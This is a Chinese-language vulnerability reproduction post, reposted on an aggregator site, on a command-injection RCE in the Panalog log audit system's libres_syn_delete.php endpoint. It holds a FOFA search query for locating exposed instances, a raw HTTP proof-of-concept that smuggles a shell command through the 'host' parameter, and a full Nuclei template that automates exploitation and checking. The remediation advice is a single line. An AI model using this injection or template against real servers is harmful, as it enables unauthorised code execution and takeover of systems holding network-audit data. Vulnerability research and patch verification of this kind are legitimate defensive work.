Panalog 日志审计系统RCE漏洞

这篇具有很好参考价值的文章主要介绍了Panalog 日志审计系统RCE漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务

Panalog 日志审计系统 libres_syn_delete.php接口处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意代码,最终导致服务器失陷。

影响范围

version <= MARS r10p1Free

Panalog 日志审计系统RCE漏洞,安全

Ⅱ、fofa语句

app="Panabit-Panalog"

Ⅲ、漏洞复现

POC

POST /content-apply/libres_syn_delete.php HTTP/1.1
Host: 1270.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
 
token=1&id=2&host=| echo "Hello World!" >ceshi.txt

1、构建poc

Panalog 日志审计系统RCE漏洞,安全

2、访问

https://127.0.0.1/content-apply/ceshi.txt

 Panalog 日志审计系统RCE漏洞,安全

Ⅳ、Nuclei-POC

id: Panalog-RCE

info:
  name: Panalog 日志审计系统 libres_syn_delete.php接口处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意代码,最终导致服务器失陷。
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="Panabit-Panalog"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /content-apply/libres_syn_delete.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip
        Connection: close
        
        token=1&id=2&host=| echo "Hello World!" >{{filename}}.txt

      - |
        GET /content-apply/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0



    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"Hello World!")

Panalog 日志审计系统RCE漏洞,安全

Ⅴ、修复建议

升级至安全版本文章来源地址https://www.toymoban.com/news/detail-831932.html

到了这里,关于Panalog 日志审计系统RCE漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 惠尔顿 网络安全审计系统 任意文件读取漏洞复现

    惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求,规范网络行为,满足国家的规范;支持1-3线路的internet接入、1-3对网桥;含强大的上网行为管理、审计、监控模块;用户访问功能,内容过滤功能;流量控制功能、带宽管理功能

    2024年02月22日
    浏览(50)
  • 亿赛通电子文档安全管理系统 RCE漏洞复现(QVD-2023-19262)

       亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智

    2024年02月12日
    浏览(49)
  • 思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现

    思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。 由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。 FOFA: PoC 厂商已发布了漏洞修复程序

    2024年02月04日
    浏览(47)
  • 云原生安全日志审计

    记得添加,把配置文件挂载进去 /etc/kubernetes/manifests/kube-apiserver.yaml  具体配置文件如下 策略文件如下所示    移动云帮助中心 云原生安全-从k8s日志审计视角检测自动化工具攻击 http://elkeid.bytedance.com/docs/ElkeidData/k8s_rule.html https://github.com/jetstack/kubernetes.github.io/blob/master/docs/

    2024年02月06日
    浏览(41)
  • 安全审计——等级保护日志审计要求的一种解决方案

        在网络安全等级保护中,对日志有着一系列的要求,通常以部署日志审计系统来满足等保的要求,此处我们选择syslog来实现日志的集中收集,统一管理。     在这里我们主要目标是满足安全区域边界、安全管理中心里的下面两条的要求。其中安全管理中心的日志

    2024年02月16日
    浏览(57)
  • 5.5 漏洞扫描:Web安全漏洞扫描及审计

    目录 一、预备知识:Web漏洞的获取方法与w3af 1. 漏洞扫描 2. 漏洞扫描器 3.  w3af 二、实验环境 三、实验步骤 四、实验思考 1. 漏洞扫描         漏洞扫描除用于网络攻击外,还用于对网络的安全防御。系统管理员通过对网络漏洞的系统扫描,全面地了解网络的安全状态,

    2024年02月09日
    浏览(45)
  • 漏洞挖掘和安全审计的技巧与策略

    🎉欢迎来到AIGC人工智能专栏~探索漏洞挖掘和安全审计的技巧与策略 ☆* o(≧▽≦)o *☆嗨~我是IT·陈寒🍹 ✨博客主页:IT·陈寒的博客 🎈该系列文章专栏:AIGC人工智能 📜其他专栏:Java学习路线 Java面试技巧 Java实战项目 AIGC人工智能 🍹文章作者技术和水平有限,如果文中出

    2024年02月11日
    浏览(37)
  • 网络安全-JDBC反序列化漏洞与RCE

    ubuntu 20:ip 10.28.144.100,安装docker、python3、docker-compose(可选)、Java(可选) windows11:ip 10.28.144.10,安装了Java、wireshark、Navicat(可选)、IDEA(可选) Java中这些magic方法在反序列化的时候会自动调用: readObject() readExternal() readResolve() readObjectNoData() validateObject() finalize() Java

    2024年02月10日
    浏览(40)
  • 日志审计系统简介

    日志审计系统简介 什么是日志审计? 综合日志审计平台,通过集中采集信息系统中的系统安全事件、用户访问记录、系统运行日志、系统运行状态等各类信息,经过规范化、过滤、归并和告警分析等处理后,以统一格式的日志形式进行集中存储和管理,结合丰富的日志统计

    2024年02月11日
    浏览(40)
  • 日志审计系统Agent项目创建——读取日志文件(Linux版本)

      紧接着上一篇的分享,继续做日志文件的读取,点击连接即可 日志文件初始化 https://blog.csdn.net/wjl990316fddwjl/article/details/135553238 完结!!!!

    2024年01月22日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包